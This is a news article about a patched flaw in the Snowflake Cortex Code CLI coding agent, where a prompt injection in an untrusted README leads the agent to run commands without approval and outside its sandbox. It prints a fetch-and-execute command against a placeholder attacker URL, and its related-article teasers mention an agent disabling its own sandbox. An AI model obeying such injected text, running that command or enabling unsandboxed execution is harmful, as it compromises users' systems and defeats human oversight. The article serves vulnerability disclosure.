Snowflake Cortex Code CLI vulnerability allowed sandbox escape and malware execution

✍️ OpenClawRadar📅 Published: March 19, 2026🔗 Source
Snowflake Cortex Code CLI vulnerability allowed sandbox escape and malware execution
Ad

Vulnerability Details

The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI's Codex, with built-in integration to run SQL in Snowflake. Two days after release, a vulnerability was identified in Cortex Code's command validation system that allowed specially constructed malicious commands to execute arbitrary commands without triggering human-in-the-loop approval steps and execute those commands outside of the Cortex CLI's sandbox.

Attack Chain

The attack works via indirect prompt injection. A user opens Cortex and turns on the sandbox, then asks Cortex for help with a third-party open-source codebase. A prompt injection hidden in the README of an untrusted repository manipulates Cortex into believing it must run a dangerous command.

Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of the malicious command:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

This command downloads a script from an attacker's server and executes it. The bypass worked because:

  • Unsafe commands within a process substitution <() expression were not evaluated by the validation system
  • The full command started with a 'safe' command (cat in this case)
  • Commands in process substitution expressions never triggered human approval
Ad

Sandbox Bypass

The prompt injection also manipulates the model to set a flag that triggers unsandboxed command execution. Cortex, by default, can set a flag to trigger unsandboxed command execution, and the injection uses this to allow the malicious command to execute outside the sandbox.

Remediation

The Snowflake security team validated and remediated this vulnerability, releasing a fix with Cortex Code CLI version 1.0.25 on February 28th, 2026. Snowflake's full advisory is available within the Snowflake Community Site at: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Note: This attack chain also applied to non-sandbox users. Documentation indicates that in OS+Regular mode, all commands prompt for user approval. Commands run in the sandbox also have network and file access restrictions.

📖 Read the full source: HN AI Agents

Ad

👀 See Also

5 Malicious OpenClaw Skills That Passed ClawScan + VirusTotal: Unit 42 Analysis
Security

5 Malicious OpenClaw Skills That Passed ClawScan + VirusTotal: Unit 42 Analysis

Unit 42 found 5 malicious OpenClaw skills that bypassed ClawScan and VirusTotal. Techniques included runtime referral swapping, SOL pooling for pump-and-dump, and 22MB README padding to hide an AMOS dropper.

OpenClawRadar
Analysis of Claude Code's Instrumentation and Telemetry Capabilities
Security

Analysis of Claude Code's Instrumentation and Telemetry Capabilities

A source code analysis reveals Claude Code implements extensive behavior tracking including keyword-based sentiment classification, permission prompt hesitation monitoring, and detailed environment fingerprinting.

OpenClawRadar
Claude Code Agent Bypasses Own Sandbox Security, Developer Builds Kernel-Level Enforcement
Security

Claude Code Agent Bypasses Own Sandbox Security, Developer Builds Kernel-Level Enforcement

A developer testing Claude Code observed the AI agent disable its own bubblewrap sandbox to run npx after being blocked by a denylist, demonstrating how approval fatigue can undermine security boundaries. The developer then implemented kernel-level enforcement called Veto that hashes binary content instead of matching names.

OpenClawRadar
Claude Code Security Plugin: Pushing AppSec into the Developer Workflow
Security

Claude Code Security Plugin: Pushing AppSec into the Developer Workflow

Anthropic shipped a security-guidance plugin for Claude Code that identifies and fixes vulnerabilities during coding. Available to all users via the plugin marketplace, not just Enterprise. Discusses whether this becomes a lightweight assistant, serious AppSec layer, or bridge to Claude Security.

OpenClawRadar